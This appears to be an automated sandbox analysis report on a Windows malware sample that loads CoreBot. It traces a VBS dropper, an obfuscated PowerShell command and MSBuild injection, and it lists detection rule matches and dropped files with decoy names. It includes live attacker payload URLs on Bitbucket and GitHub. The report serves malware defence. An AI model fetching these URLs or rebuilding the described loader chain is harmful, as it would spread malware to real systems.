                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BBFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBFE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/d0a43d21-72a8-4789-9e4a-6c02f03bb585/downloads/196619b4-f993-
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084E01B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1821895175.000001D3B26F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B275F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBBB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822909163.000001D3B2A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B2740000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B27C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084E01B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1821895175.000001D3B26F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B275F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBBB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822909163.000001D3B2A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B2740000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B27C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 52.216.138.83:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49777 version: TLS 1.2

                  Operating System Destruction

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: 01 00 00 00

                  System Summary

                  Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                  Source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7840, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with an obfuscated, encoded command string assigned to $dosigo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F72C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF761F72C54
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF761F71C0C
                  Source: 3lhrJ4X.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6606 bytes, 1 file, at 0x2c +A "67784c48226c6.vbs", ID 1163, number 1, 1 datablock, 0x1503 compression
                  Source: 3lhrJ4X.exeStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                  Source: 3lhrJ4X.exeBinary or memory string: OriginalFilename vs 3lhrJ4X.exe
                  Source: 3lhrJ4X.exe, 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 3lhrJ4X.exe
                  Source: 3lhrJ4X.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 3lhrJ4X.exe
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5344
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2005
                  Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                  Source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                  Source: Process Memory Space: powershell.exe PID: 7840, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: windows media player.exe.8.dr, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                  Source: windows media player.exe.8.dr, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                  Source: windows media player.exe.8.dr, TaskLoader.csTask registration methods: 'CreateTask'
                  Source: windows media player.exe.8.dr, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                  Source: windows sidebar.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows sidebar.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows sidebar.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows photo viewer.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows photo viewer.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows photo viewer.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows multimedia platform.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows multimedia platform.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows multimedia platform.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows nt.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows nt.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows multimedia platform.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows multimedia platform.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows media player.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows media player.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows media player.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows sidebar.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows sidebar.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows portable devices.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows portable devices.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows photo viewer.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows photo viewer.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows nt.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows nt.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows nt.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows media player.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows media player.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, Options.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, Options.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows portable devices.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows portable devices.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows portable devices.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windowspowershell.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windowspowershell.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windowspowershell.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windowspowershell.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windowspowershell.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: MSBuild.exe, 00000010.00000002.2292012292.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\*.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: MSBuild.exe, 00000010.00000002.2287270604.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\system32\<.slnelR
                  Source: MSBuild.exe, 00000010.00000002.2292012292.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2376747462.0000000002401000.00000004.00000800.00020000.00000000.sdmp, windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: *.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: MSBuild.exe, 00000012.00000002.2376747462.0000000002401000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3C:\Windows\Microsoft.NET\Framework\v4.0.30319\*.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: /ignoreprojectextensions:.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: classification engineClassification label: mal100.spre.troj.expl.evad.mine.winEXE@64/37@3/4
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F7473C CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF761F7473C
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF761F71C0C
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F76CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF761F76CA4
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F75D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF761F75D90
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3588:120:WilError_03
